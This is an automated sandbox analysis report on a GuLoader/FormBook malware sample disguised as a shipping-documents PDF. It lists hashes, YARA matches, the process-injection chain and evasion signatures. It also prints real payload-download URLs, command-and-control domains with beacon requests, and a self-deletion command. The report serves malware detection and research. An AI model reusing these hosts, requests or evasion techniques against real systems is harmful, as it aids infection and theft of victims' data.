Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Shipping Documents (INV,PL,BL)_pdf.exe

Overview

General Information

Sample Name:Shipping Documents (INV,PL,BL)_pdf.exe
Analysis ID:320999
MD5:aed402d9a5675f5796265e5170ada7cb
SHA1:d2e2087f83c1ef3d10cbe60acb721745d19306b3
SHA256:44350179d4fdd08fd02c02b733f80c82d54f5af31c8a2432de9cfb6b11ab4aa0
Tags:DHLexeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Shipping Documents (INV,PL,BL)_pdf.exe (PID: 2540 cmdline: 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: AED402D9A5675F5796265E5170ADA7CB)
    • Shipping Documents (INV,PL,BL)_pdf.exe (PID: 5268 cmdline: 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: AED402D9A5675F5796265E5170ADA7CB)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5896 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x5368:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 16 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: https://lifeandhealth.com.mx/)Avira URL Cloud: Label: malware
      Source: https://lifeandhealth.com.mx/xAvira URL Cloud: Label: malware
      Source: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bindAvira URL Cloud: Label: malware
      Source: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_Avira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted fileShow sources
      Source: Shipping Documents (INV,PL,BL)_pdf.exeVirustotal: Detection: 21%Perma Link
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi11_2_00C672B0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi11_2_00C66BC7
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1Host: www.drinksandfruits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1Host: www.iatlet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: NETSOURCEUS NETSOURCEUS
      Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: C:\Windows\explorer.exeCode function: 3_2_061F5782 getaddrinfo,setsockopt,recv,3_2_061F5782
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1Host: www.drinksandfruits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1Host: www.iatlet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: lifeandhealth.com.mx
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 07:55:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cert.i
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
      Source: explorer.exe, 00000003.00000000.297520534.000000000F6D4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.com/icm9/www.verifyinstagram-help.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.com/icm9/www.kalcio.site
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.com/icm9/www.iatlet.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.net
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.net/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.net/icm9/www.hunexhq.icu
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.netReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.com/icm9/M
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.com/icm9/www.smartbulk.store
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icu
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icu/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icu/icm9/www.frontierautoglasswheatfield.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icuReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.com/icm9/www.leepl.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.com/icm9/www.gcsisgreen.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.site
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.site/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.site/icm9/www.mademoisellepierre.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.siteReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.com/icm9/www.nationalcanopies.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.com/icm9/www.84streetchamber.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.com/icm9/www.images77.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.com/icm9/www.cannahavedessert.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.store
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.store/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.store/icm9/www.machevate.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.storeReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.com/icm9/www.faithinfitness.net
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/)
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bind
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/x
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000000.00000002.241695926.00000000006BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: Shipping Documents (INV,PL,BL)_pdf.exeStatic file information: Suspicious name
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Shipping Documents (INV,PL,BL)_pdf.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F7FAA NtWriteVirtualMemory,0_2_020F7FAA
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F97D3 NtResumeThread,0_2_020F97D3
